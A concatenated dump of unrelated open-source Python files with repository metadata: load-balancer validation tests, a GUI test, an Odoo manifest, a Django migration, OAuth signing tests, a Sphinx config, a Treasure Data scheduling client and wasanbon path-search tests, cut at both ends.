port) # Check exposed ports for containers work check_access(host, port1, CONTAINER_HOST_NAMES[0]) check_access(host, port2, CONTAINER_HOST_NAMES[1]) delete_all(client, [lb, con1, con2]) def test_lb_with_lb_cookie(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8095" logger.info("Create LB for 2 targets with lbCookieStickinessPolicy " + "on port - " + port) lbcookie_policy = {"lbCookieStickinessPolicy": {"mode": "insert", "cookie": "cookie-1", "indirect": True, "nocache": True, "postonly": False } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=lbcookie_policy ) con_hostname = CONTAINER_HOST_NAMES[0:2] check_for_lbcookie_policy(con_hostname, host, port) delete_all(client, [lb]) def test_lb_with_app_cookie(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8096" cookie_name = "appcookie1" logger.info("Create LB for 2 targets with appCookieStickinessPolicy " + "on port - " + port) appcookie_policy = {"appCookieStickinessPolicy": {"mode": "query_string", "requestLearn": True, "timeout": 3600000, "cookie": cookie_name, "maxLength": 40, "prefix": False } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=appcookie_policy ) con_hostname = CONTAINER_HOST_NAMES[0:2] check_for_appcookie_policy(con_hostname, host, port, cookie_name) delete_all(client, [lb]) def test_lb_with_health_check_with_uri(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8097" logger.info("Create LB for 2 targets with health check enabled " + "on port - " + port) health_check = {"healthCheck": {"interval": 2000, "responseTimeout": 2000, "healthyThreshold": 2, "unhealthyThreshold": 3, "uri": "GET /name.html" } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=health_check ) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=TEST_IMAGE_UUID, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_with_health_check_without_uri(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8098" logger.info("Create LB for 2 targets with health check enabled " + "on port - " + port) health_check = {"healthCheck": {"interval": 2000, "responseTimeout": 2000, "healthyThreshold": 2, "unhealthyThreshold": 3 } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=health_check ) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=TEST_IMAGE_UUID, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_with_source(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8101" logger.info("Create LB for 2 targets with source algorithm " + "on port - " + port) lb, lb_config = \ 
create_lb_with_one_listener_one_host_two_targets( client, host, port, listener_algorithm="source" ) con_hostname = CONTAINER_HOST_NAMES[0:2] check_for_stickiness(con_hostname, host, port) delete_all(client, [lb]) def check_round_robin_access(container_names, host, port): wait_until_lb_is_active(host, port) con_hostname = container_names[:] con_hostname_ordered = [] url = "http://" + host.ipAddresses()[0].address +\ ":" + port + "/name.html" logger.info(url) for n in range(0, len(con_hostname)): r = requests.get(url) response = r.text.strip("\n") logger.info(response) r.close() assert response in con_hostname con_hostname.remove(response) con_hostname_ordered.append(response) logger.info(con_hostname_ordered) i = 0 for n in range(0, 10): r = requests.get(url) response = r.text.strip("\n") r.close() logger.info(response) assert response == con_hostname_ordered[i] i = i + 1 if i == len(con_hostname_ordered): i = 0 def check_no_access(host, port): try: url = "http://" + host.ipAddresses()[0].address + ":" +\ port + "/name.html" requests.get(url) assert False except requests.ConnectionError: logger.info("Connection Error - " + url) def check_access(host, port, expected_response): url = "http://" + host.ipAddresses()[0].address + ":" +\ port + "/name.html" r = requests.get(url) response = r.text.strip("\n") logger.info(response) r.close() assert response == expected_response def check_for_appcookie_policy(container_names, host, port, cookie_name): wait_until_lb_is_active(host, port) con_hostname = container_names[:] url = "http://" + host.ipAddresses()[0].address + \ ":" + port + "/name.html" headers = {"Cookie": cookie_name + "=test123"} r = requests.get(url, headers=headers) sticky_response = r.text.strip("\n") logger.info(sticky_response) r.close() assert sticky_response in con_hostname for n in range(0, 10): r = requests.get(url, headers=headers) response = r.text.strip("\n") r.close() logger.info(response) assert response == sticky_response def check_for_lbcookie_policy(container_names, host, port): wait_until_lb_is_active(host, port) con_hostname = container_names[:] url = "http://" + host.ipAddresses()[0].address + \ ":" + port + "/name.html" session = requests.Session() r = session.get(url) sticky_response = r.text.strip("\n") logger.info(sticky_response) r.close() assert sticky_response in con_hostname for n in range(0, 10): r = session.get(url) response = r.text.strip("\n") r.close() logger.info(response) assert response == sticky_response def check_for_stickiness(container_names, host, port): wait_until_lb_is_active(host, port) con_hostname = container_names[:] url = "http://" + host.ipAddresses()[0].address + \ ":" + port + "/name.html" r = requests.get(url) sticky_response = r.text.strip("\n") logger.info(sticky_response) r.close() assert sticky_response in con_hostname for n in range(0, 10): r = requests.get(url) response = r.text.strip("\n") r.close() logger.info(response) assert response == sticky_response def validate_add_target(client, container, lb): target_maps = client.list_loadBalancerTarget(loadBalancerId=lb.id, instanceId=container.id) assert len(target_maps) == 1 target_map = target_maps[0] wait_for_condition( client, target_map, lambda x: x.state == "active", lambda x: 'State is: ' + x.state) def validate_remove_target(client, container, lb): target_maps = client.list_loadBalancerTarget(loadBalancerId=lb.id, instanceId=container.id) assert len(target_maps) == 1 target_map = target_maps[0] wait_for_condition( client, target_map, lambda x: x.state == "removed", lambda x: 
'State is: ' + x.state) def validate_add_listener(client, listener, lb_config): lb_config_maps = client.\ list_loadBalancerConfigListenerMap(loadBalancerListenerId=listener.id, loadBalancerConfigId=lb_config.id) assert len(lb_config_maps) == 1 config_map = lb_config_maps[0] wait_for_condition( client, config_map, lambda x: x.state == "active", lambda x: 'State is: ' + x.state) def validate_remove_listener(client, listener, lb_config): lb_config_maps = client.\ list_loadBalancerConfigListenerMap(loadBalancerListenerId=listener.id, loadBalancerConfigId=lb_config.id) assert len(lb_config_maps) == 1 config_map = lb_config_maps[0] wait_for_condition( client, config_map, lambda x: x.state == "removed", lambda x: 'State is: ' + x.state) def validate_add_host(client, host, lb): host_maps = client.list_loadBalancerHostMap(loadBalancerId=lb.id, hostId=host.id, removed_null=True) assert len(host_maps) == 1 host_map = host_maps[0] wait_for_condition( client, host_map, lambda x: x.state == "active", lambda x: 'State is: ' + x.state) def validate_remove_host(client, host, lb): host_maps = client.list_loadBalancerHostMap(loadBalancerId=lb.id, hostId=host.id) assert len(host_maps) == 1 host_map = host_maps[0] wait_for_condition( client, host_map, lambda x: x.state == "removed", lambda x: 'State is: ' + x.state) def wait_until_lb_is_active(host, port, timeout=45): start = time.time() while check_for_no_access(host, port): time.sleep(.5) print "No access yet" if time.time() - start > timeout: raise Exception('Timed out waiting for LB to become active') return def check_for_no_access(host, port): try: url = "http://" + host.ipAddresses()[0].address + ":" +\ port + "/name.html" requests.get(url) return False except requests.ConnectionError: logger.info("Connection Error - " + url) return True
sonchang/validation-tests
tests/validation/cattlevalidationtest/core/test_lb.py
Python
apache-2.0
39,502
# GUI Application automation and testing library # Copyright (C) 2006 Mark Mc Mahon # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public License # as published by the Free Software Foundation; either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., # 59 Temple Place, # Suite 330, # Boston, MA 02111-1307 USA """Miscellaneous Control properties Test **What is checked** This checks various values related to a control in windows. The values tested are Class The class type of the control Style The Style of the control (GetWindowLong) ExStyle The Extended Style of the control (GetWindowLong) HelpID The Help ID of the control (GetWindowLong) ControlID The Control ID of the control (GetWindowLong) UserData The User Data of the control (GetWindowLong) Visibility Whether the control is visible or not **How is it checked** After retrieving the information for the control we compare it to the same information from the reference control. **When is a bug reported** If the information does not match then a bug is reported. **Bug Extra Information** The bug contains the following extra information Name Description ValueType What value is incorrect (see above), String Ref The reference value converted to a string, String Loc The localised value converted to a string, String **Is Reference dialog needed** This test will not run if the reference controls are not available. **False positive bug reports** Some values can change easily without any bug being caused, for example User Data is actually meant for programmers to store information for the control and this can change every time the software is run. **Test Identifier** The identifier for this test/bug is "MiscValues" """ __revision__ = "$Revision: 616 $" testname = "MiscValues" def MiscValuesTest(windows): "Return the bugs from checking miscelaneous values of a control" bugs = [] for win in windows: if not win.ref: continue diffs = {} if win.Class() != win.ref.Class(): diffs[u"Class"] = (win.Class(), win.ref.Class()) if win.Style() != win.ref.Style(): diffs[u"Style"] = (win.Style(), win.ref.Style()) if win.ExStyle() != win.ref.ExStyle(): diffs[u"ExStyle"] = (win.ExStyle(), win.ref.ExStyle()) if win.ContextHelpID() != win.ref.ContextHelpID(): diffs[u"HelpID"] = (win.ContextHelpID(), win.ref.ContextHelpID()) if win.ControlID() != win.ref.ControlID(): diffs[u"ControlID"] = (win.ControlID(), win.ref.ControlID()) if win.IsVisible() != win.ref.IsVisible(): diffs[u"Visibility"] = (win.IsVisible(), win.ref.IsVisible()) if win.UserData() != win.ref.UserData(): diffs[u"UserData"] = (win.UserData(), win.ref.UserData()) for diff, vals in diffs.items(): bugs.append(( [win, ], { "ValueType": diff, "Ref": unicode(vals[1]), "Loc": unicode(vals[0]), }, testname, 0,) ) return bugs
qspin/qtaste
demo/pywinauto-0.3.8/pywinauto/tests/miscvalues.py
Python
lgpl-3.0
3,745
# -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. { 'name': 'Margins in Sales Orders', 'version':'1.0', 'category': 'Sales', 'description': """ This module adds the 'Margin' on sales order. ============================================= This gives the profitability by calculating the difference between the Unit Price and Cost Price. """, 'depends':['sale'], 'demo':['data/sale_margin_demo.xml'], 'data':['security/ir.model.access.csv','views/sale_margin_view.xml'], }
chienlieu2017/it_management
odoo/addons/sale_margin/__manifest__.py
Python
gpl-3.0
552
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-01-08 13:14 from __future__ import unicode_literals import core.validators from django.db import migrations, models import django.db.models.deletion import django_date_extensions.fields class Migration(migrations.Migration): replaces = [('organize', '0001_initial'), ('organize', '0002_auto_20170107_1348'), ('organize', '0003_auto_20170107_1453'), ('organize', '0004_remove_eventapplication_rejection_reason')] initial = True dependencies = [ ('core', '0026_auto_20170107_0939'), ] operations = [ migrations.CreateModel( name='Coorganizer', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('email', models.EmailField(max_length=254)), ('first_name', models.CharField(max_length=30)), ('last_name', models.CharField(max_length=30)), ], options={ 'verbose_name': 'Co-organizer', 'verbose_name_plural': 'Co-organizers', }, ), migrations.CreateModel( name='EventApplication', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', django_date_extensions.fields.ApproximateDateField(validators=[core.validators.validate_approximatedate])), ('city', models.CharField(max_length=200)), ('country', models.CharField(max_length=200)), ('latlng', models.CharField(blank=True, max_length=30, null=True)), ('website_slug', models.SlugField()), ('main_organizer_email', models.EmailField(max_length=254)), ('main_organizer_first_name', models.CharField(max_length=30)), ('main_organizer_last_name', models.CharField(max_length=30)), ('created_at', models.DateTimeField(auto_now_add=True)), ('about_you', models.TextField()), ('why', models.TextField()), ('involvement', models.CharField(choices=[('newcomer', 'I’ve never been to a Django Girls event'), ('attendee', 'I’m a former attendee'), ('coach', 'I’m a former coach'), ('organizer', 'I’m a former organizer'), ('contributor', 'I contributed to the tutorial or translations')], max_length=15)), ('experience', models.TextField()), ('venue', models.TextField()), ('sponsorship', models.TextField()), ('coaches', models.TextField()), ('previous_event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='core.Event')), ('status', models.CharField(choices=[('new', 'New'), ('in_review', 'In review'), ('on_hold', 'On hold'), ('accepted', 'Accepted'), ('rejected', 'Rejected')], default='new', max_length=10)), ('status_changed_at', models.DateTimeField(blank=True, null=True)), ('comment', models.TextField(blank=True, null=True)), ], options={ 'permissions': (('can_accept_organize_application', 'Can accept Organize Applications'),), }, ), migrations.AddField( model_name='coorganizer', name='event_application', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='coorganizers', to='organize.EventApplication'), ), ]
patjouk/djangogirls
organize/migrations/0001_squashed_0004_remove_eventapplication_rejection_reason.py
Python
bsd-3-clause
3,612
import urlparse from oauth10a import signing_requests from tests import test_oauth10a class TestCase(test_oauth10a.TestCase): def test_trivial(self): self.assertTrue(signing_requests) def test_request_url(self): url = 'HTTP://Example.com:80/resource?id=123' request_url = signing_requests.request_url(url) self.assertEqual(request_url, 'http://example.com/resource') def test_normalized_request_parameters(self): normalized = signing_requests.normalized_request_parameters( oauth_params=dict(a=1, c='hi%20there', f=25, z='p'), get_params=dict(f=50, z='t'), post_params=dict(f='a')) self.assertEqual(normalized, 'a=1&c=hi%20there&f=25&f=50&f=a&z=p&z=t') def test_normalized_request_parameters_excludes_oauth_signature(self): normalized = signing_requests.normalized_request_parameters( oauth_params=dict( oauth_consumer_key='dpf43f3p2l4k3l03', oauth_token='nnch734d00sl2jdk', oauth_signature_method='HMAC-SHA1', oauth_signature='pending', oauth_timestamp='1191242096', oauth_nonce='kllo9940pd9333jh', oauth_version='1.0'), get_params=dict( file='vacation.jpg', size='original'), post_params=dict()) self.assertEqual( normalized, 'file=vacation.jpg&oauth_consumer_key=dpf43f3p2l4k3l03&oauth_nonce' '=kllo9940pd9333jh&oauth_signature_method=HMAC-SHA1&oauth_timestam' 'p=1191242096&oauth_token=nnch734d00sl2jdk&oauth_version=1.0&size=' 'original') def test_signature_base_string(self): s = signing_requests.signature_base_string( http_method='GET', url='http://photos.example.net/photos', oauth_params=dict( oauth_consumer_key='dpf43f3p2l4k3l03', oauth_token='nnch734d00sl2jdk', oauth_signature_method='HMAC-SHA1', oauth_timestamp='1191242096', oauth_nonce='kllo9940pd9333jh', oauth_version='1.0'), get_params=dict( file='vacation.jpg', size='original'), post_params=dict()) self.assertEqual( s, 'GET&http%3A%2F%2Fphotos.example.net%2Fphotos&file%3Dvacation.jpg%' '26oauth_consumer_key%3Ddpf43f3p2l4k3l03%26oauth_nonce%3Dkllo9940p' 'd9333jh%26oauth_signature_method%3DHMAC-SHA1%26oauth_timestamp%3D' '1191242096%26oauth_token%3Dnnch734d00sl2jdk%26oauth_version%3D1.0' '%26size%3Doriginal') class LinkedInTestCase(test_oauth10a.TestCase): def setUp(self): # http://developer.linkedin.com/oauth-test-console self.consumer_key = 'efubm7z8ww6k40m9l5czq25l0' self.consumer_secret = '1ln2puav04fl6s22oy0l98x69' self.member_token = 'akk4fj6h5967zc0ra6hzmsd62' self.member_secret = 'amppgl8vnr7hgaqqzi0igoq4f' self.http_verb = 'GET' self.url = 'http://example.com/8szrt134wyc0e8kdqwxj3bmf' self.query_params = '5268cf=4rbjsn&a7xbsd=7h0qfi' self.nonce = 'mjylxo54rrqad1fjxjhf67cc' self.timestamp = 1375241716 self.expected_signature_base_string = ( 'GET&http%3A%2F%2Fexample.com%2F8szrt134wyc0e8kdqwxj3bmf&5268cf%3D' '4rbjsn%26a7xbsd%3D7h0qfi%26oauth_consumer_key%3Defubm7z8ww6k40m9l' '5czq25l0%26oauth_nonce%3Dmjylxo54rrqad1fjxjhf67cc%26oauth_signatu' 're_method%3DHMAC-SHA1%26oauth_timestamp%3D1375241716%26oauth_toke' 'n%3Dakk4fj6h5967zc0ra6hzmsd62%26oauth_version%3D1.0') self.expected_signature = 'Ilt9SqALMiI9fwmgrNv+JzICEF4=' self.expected_http_authentication_header = ( 'OAuth oauth_nonce="mjylxo54rrqad1fjxjhf67cc" oauth_timestamp="137' '5241716" oauth_version="1.0" oauth_signature_method="HMAC-SHA1" o' 'auth_consumer_key="efubm7z8ww6k40m9l5czq25l0" oauth_token="akk4fj' '6h5967zc0ra6hzmsd62" oauth_signature="Ilt9SqALMiI9fwmgrNv%2BJzICE' 'F4%3D"') self.expected_url = 'http://example.com/8szrt134wyc0e8kdqwxj3bmf' def test_request_url(self): url = self.url request_url = signing_requests.request_url(url) self.assertEqual(request_url, self.expected_url) 
def test_signature_base_string(self): s = signing_requests.signature_base_string( http_method=self.http_verb, url=self.url, oauth_params=dict( oauth_consumer_key=self.consumer_key, oauth_token=self.member_token, oauth_signature_method='HMAC-SHA1', oauth_timestamp=str(self.timestamp), oauth_nonce=self.nonce, oauth_version='1.0'), get_params=dict(urlparse.parse_qsl(self.query_params))) self.assertEqual(s, self.expected_signature_base_string)
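# Editor's note (not part of the original test module): the tests above only build
# and compare signature base strings; for context, this is how an HMAC-SHA1 OAuth
# 1.0a signature is normally derived from such a base string (per OAuth Core 1.0a).
# It is a stand-alone Python 3 sketch and does not call into the oauth10a package.
import base64
import hashlib
import hmac
from urllib.parse import quote


def hmac_sha1_signature(base_string, consumer_secret, token_secret=""):
    # The signing key is the two percent-encoded secrets joined with "&";
    # the signature is the base64-encoded HMAC-SHA1 digest of the base string.
    key = "&".join(quote(s, safe="") for s in (consumer_secret, token_secret))
    digest = hmac.new(key.encode(), base_string.encode(), hashlib.sha1).digest()
    return base64.b64encode(digest).decode()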
dolph/python-oauth10a
tests/test_signing_requests.py
Python
apache-2.0
5,074
import sys, os from sphinx.highlighting import lexers from pygments.lexers.web import PhpLexer lexers['php'] = PhpLexer(startinline=True, linenos=1) lexers['php-annotations'] = PhpLexer(startinline=True, linenos=1) primary_domain = 'php' extensions = [] templates_path = ['_templates'] source_suffix = '.rst' master_doc = 'index' project = u'Wunderlist PHP SDK' copyright = u'2015, Ítalo Lelis de Vietro' version = '4.0.0' html_title = "Wunderlist PHP SDK Documentation" html_short_title = "Wunderlist PHP SDK" exclude_patterns = ['_build'] html_static_path = ['_static'] on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
italolelis/wunderlist
docs/conf.py
Python
mit
839
class User(object): def __init__(self, username=None, password=None, email=None): self.username = username self.password = password self.email = email @classmethod def admin(cls): return cls(username="admin", password="admin") #random values for username and password @classmethod def random_data(cls): from random import randint return cls(username="user" + str(randint(0, 1000)), password="pass" + str(randint(0, 1000)))
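# Editor's note (not part of the original file): a small illustration of how these
# factory methods are used; the `model.user` import path is an assumption based on
# this file living at php4dvd/model/user.py.
from model.user import User

admin = User.admin()           # fixed credentials: admin / admin
someone = User.random_data()   # e.g. user42 / pass7, email left as None
assert admin.username == "admin" and someone.email is None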
ArtemVavilov88/php4dvd_tests
php4dvd/model/user.py
Python
apache-2.0
512
from vcms.simpleblogs.tests.test_page_build import * from vcms.simpleblogs.tests.test_blog_page_controller import *
francisl/vcms
modules/vcms/simpleblogs/tests/__init__.py
Python
bsd-3-clause
116
#!/usr/bin/env python from .util import create_url, get_or_else, parse_date class ScheduleAPI: """Access to Schedule API This class is inherited by :class:`tdclient.api.API`. """ def create_schedule(self, name, params=None): """Create a new scheduled query with the specified name. Args: name (str): Scheduled query name. params (dict, optional): Extra parameters. - type (str): Query type. {"presto", "hive"}. Default: "hive" - database (str): Target database name. - timezone (str): Scheduled query's timezone. e.g. "UTC" For details, see also: https://gist.github.com/frsyuki/4533752 - cron (str, optional): Schedule of the query. {``"@daily"``, ``"@hourly"``, ``"10 * * * *"`` (custom cron)} See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084633/Scheduling+Jobs+Using+TD+Console - delay (int, optional): A delay ensures all buffered events are imported before running the query. Default: 0 - query (str): Is a language used to retrieve, insert, update and modify data. See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084438/SQL+Examples+of+Scheduled+Queries - priority (int, optional): Priority of the query. Range is from -2 (very low) to 2 (very high). Default: 0 - retry_limit (int, optional): Automatic retry count. Default: 0 - engine_version (str, optional): Engine version to be used. If none is specified, the account's default engine version would be set. {"stable", "experimental"} - pool_name (str, optional): For Presto only. Pool name to be used, if not specified, default pool would be used. - result (str, optional): Location where to store the result of the query. e.g. 'tableau://user:[email protected]:1234/datasource' Returns: datetime.datetime: Start date time. """ params = {} if params is None else params params.update({"type": params.get("type", "hive")}) with self.post( create_url("/v3/schedule/create/{name}", name=name), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Create schedule failed", res, body) js = self.checked_json(body, ["start"]) return parse_date(get_or_else(js, "start", "1970-01-01T00:00:00Z")) def delete_schedule(self, name): """Delete the scheduled query with the specified name. Args: name (str): Target scheduled query name. Returns: (str, str): Tuple of cron and query. """ with self.post(create_url("/v3/schedule/delete/{name}", name=name)) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Delete schedule failed", res, body) js = self.checked_json(body, ["cron", "query"]) return js["cron"], js["query"] def list_schedules(self): """Get the list of all the scheduled queries. Returns: [(name:str, cron:str, query:str, database:str, result_url:str)] """ with self.get("/v3/schedule/list") as res: code, body = res.status, res.read() if code != 200: self.raise_error("List schedules failed", res, body) js = self.checked_json(body, ["schedules"]) return [schedule_to_tuple(m) for m in js["schedules"]] def update_schedule(self, name, params=None): """Update the scheduled query. Args: name (str): Target scheduled query name. params (dict): Extra parameters. - type (str): Query type. {"presto", "hive"}. Default: "hive" - database (str): Target database name. - timezone (str): Scheduled query's timezone. e.g. "UTC" For details, see also: https://gist.github.com/frsyuki/4533752 - cron (str, optional): Schedule of the query. 
{``"@daily"``, ``"@hourly"``, ``"10 * * * *"`` (custom cron)} See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084633/Scheduling+Jobs+Using+TD+Console - delay (int, optional): A delay ensures all buffered events are imported before running the query. Default: 0 - query (str): Is a language used to retrieve, insert, update and modify data. See also: https://tddocs.atlassian.net/wiki/spaces/PD/pages/1084438/SQL+Examples+of+Scheduled+Queries - priority (int, optional): Priority of the query. Range is from -2 (very low) to 2 (very high). Default: 0 - retry_limit (int, optional): Automatic retry count. Default: 0 - engine_version (str, optional): Engine version to be used. If none is specified, the account's default engine version would be set. {"stable", "experimental"} - pool_name (str, optional): For Presto only. Pool name to be used, if not specified, default pool would be used. - result (str, optional): Location where to store the result of the query. e.g. 'tableau://user:[email protected]:1234/datasource' """ params = {} if params is None else params with self.post( create_url("/v3/schedule/update/{name}", name=name), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Update schedule failed", res, body) def history(self, name, _from=0, to=None): """Get the history details of the saved query for the past 90days. Args: name (str): Target name of the scheduled query. _from (int, optional): Indicates from which nth record in the run history would be fetched. Default: 0. Note: Count starts from zero. This means that the first record in the list has a count of zero. to (int, optional): Indicates up to which nth record in the run history would be fetched. Default: 20 Returns: dict: History of the scheduled query. """ params = {} if _from is not None: params["from"] = str(_from) if to is not None: params["to"] = str(to) with self.get( create_url("/v3/schedule/history/{name}", name=name), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("List history failed", res, body) js = self.checked_json(body, ["history"]) return [history_to_tuple(m) for m in js["history"]] def run_schedule(self, name, time, num=None): """Execute the specified query. Args: name (str): Target scheduled query name. time (int): Time in Unix epoch format that would be set as TD_SCHEDULED_TIME num (int, optional): Indicates how many times the query will be executed. Value should be 9 or less. 
Default: 1 Returns: list of tuple: [(job_id:int, type:str, scheduled_at:str)] """ params = {} if num is not None: params = {"num": num} with self.post( create_url("/v3/schedule/run/{name}/{time}", name=name, time=time), params ) as res: code, body = res.status, res.read() if code != 200: self.raise_error("Run schedule failed", res, body) js = self.checked_json(body, ["jobs"]) return [job_to_tuple(m) for m in js["jobs"]] def job_to_tuple(m): job_id = m.get("job_id") scheduled_at = parse_date(get_or_else(m, "scheduled_at", "1970-01-01T00:00:00Z")) t = m.get("type", "?") return job_id, t, scheduled_at def schedule_to_tuple(m): m = dict(m) if "timezone" not in m: m["timezone"] = "UTC" m["created_at"] = parse_date(get_or_else(m, "created_at", "1970-01-01T00:00:00Z")) m["next_time"] = parse_date(get_or_else(m, "next_time", "1970-01-01T00:00:00Z")) return m def history_to_tuple(m): job_id = m.get("job_id") t = m.get("type", "?") database = m.get("database") status = m.get("status") query = m.get("query") start_at = parse_date(get_or_else(m, "start_at", "1970-01-01T00:00:00Z")) end_at = parse_date(get_or_else(m, "end_at", "1970-01-01T00:00:00Z")) scheduled_at = parse_date(get_or_else(m, "scheduled_at", "1970-01-01T00:00:00Z")) result_url = m.get("result") priority = m.get("priority") return ( scheduled_at, job_id, t, status, query, start_at, end_at, result_url, priority, database, )
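# Editor's note (not part of the original module): a usage sketch built only from
# the docstrings above. `api` is assumed to be a tdclient.api.API instance (the
# class this mixin is documented to be inherited by); the database, query and
# schedule values are placeholders.
def create_and_run_daily_count(api):
    params = {
        "type": "presto",
        "database": "sample_datasets",
        "query": "SELECT COUNT(1) FROM www_access",
        "cron": "@daily",
        "timezone": "UTC",
        "priority": 0,
        "retry_limit": 0,
    }
    start = api.create_schedule("daily_access_count", params)  # datetime of first run
    jobs = api.run_schedule("daily_access_count", 1640995200)  # [(job_id, type, scheduled_at)]
    return start, jobs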
treasure-data/td-client-python
tdclient/schedule_api.py
Python
apache-2.0
9,750
# test for wasanbon/core/plugins/admin/environment_plugin/setup/path.py

import unittest
from unittest import mock
from unittest.mock import Mock, call
import os

from wasanbon.core.plugins.admin.environment_plugin.setup import path


class TestPlugin(unittest.TestCase):

    @mock.patch('sys.stdout.write')
    def test_search_command_linux_import_python(self, sys_stdout_write):
        """test for search_command (import python module)"""
        test_module = 'test_hoge'
        test_module_path = 'test_hoge_path'
        test_cmd = 'python_test_hoge'
        test_path = 'test_path'
        test_hints = ['h1', 'h2']
        # mock to import by __import__
        mock_modules = Mock(spec=['__path__'])
        mock_modules.__path__ = [test_module_path]
        import sys
        sys.modules[test_module] = mock_modules
        # test
        ret = path.search_command(
            test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, test_module_path)

    @mock.patch('sys.stdout.write')
    def test_search_command_linux_failed_to_import_python(self, sys_stdout_write):
        """test for search_command (failed to import python module)"""
        test_cmd = 'python_test_hoge'
        test_path = 'test_path'
        test_hints = ['h1', 'h2']
        ret = path.search_command(
            test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, '')

    @mock.patch('sys.stdout.write')
    @mock.patch('os.path.isfile')
    def test_search_command_cmd_file_found(self, mock_isfile, sys_stdout_write):
        """test for search_command (not python, path endswith cmd)"""
        test_cmd = 'test_cmd'
        test_path = 'test_path_test_cmd'
        test_hints = ['h1', 'h2']
        mock_isfile.return_value = True
        # test
        ret = path.search_command(
            test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
            call('## Searching %s ... ' % (test_cmd)),
            call(' Found in %s\n' % test_path)
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, test_path)

    @mock.patch('sys.stdout.write')
    @mock.patch('os.path.isfile')
    @mock.patch('os.environ', new={'PATH': ''})
    def test_search_command_linux_cmd_not_in_path_notfoud(self, mock_isfile, sys_stdout_write):
        """test for search_command (not python, cmd file not found, darwin & linux)"""
        test_cmd = 'test_cmd'
        test_path = 'test_path_te,st_cmd'
        test_hints = ['h1', 'h2']
        mock_isfile.return_value = False
        # test
        ret = path.search_command(
            test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
            call('## Searching %s ... ' % (test_cmd)),
            call(' Not found.\n')
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, '')

    @mock.patch('sys.platform', new='linux')
    @mock.patch('sys.stdout.write')
    @mock.patch('os.path.isfile')
    @mock.patch('os.environ', new={'PATH': 'hoge:fuga'})
    def test_search_command_linux_cmd_not_in_path_foud(self, mock_isfile, sys_stdout_write):
        """test for search_command (not python, darwin & linux)"""
        test_cmd = 'test_cmd'
        test_path = 'test_path_te,st_cmd'
        test_hints = ['h1', 'h2']
        mock_isfile.return_value = True
        # test
        ret = path.search_command(
            test_cmd, test_path, test_hints, verbose=True)
        sys_out_calls = [
            call('## Searching Command (%s)\n' % test_cmd),
            call('### Hint: %s\n' % test_hints[0]),
            call('### Hint: %s\n' % test_hints[1]),
            call('## Searching %s ... ' % (test_cmd)),
            call(' Found in %s. \n' % os.path.join('hoge', test_cmd))
        ]
        sys_stdout_write.assert_has_calls(sys_out_calls)
        self.assertEqual(ret, os.path.join('hoge', test_cmd))

    @mock.patch('sys.platform', new='darwin')
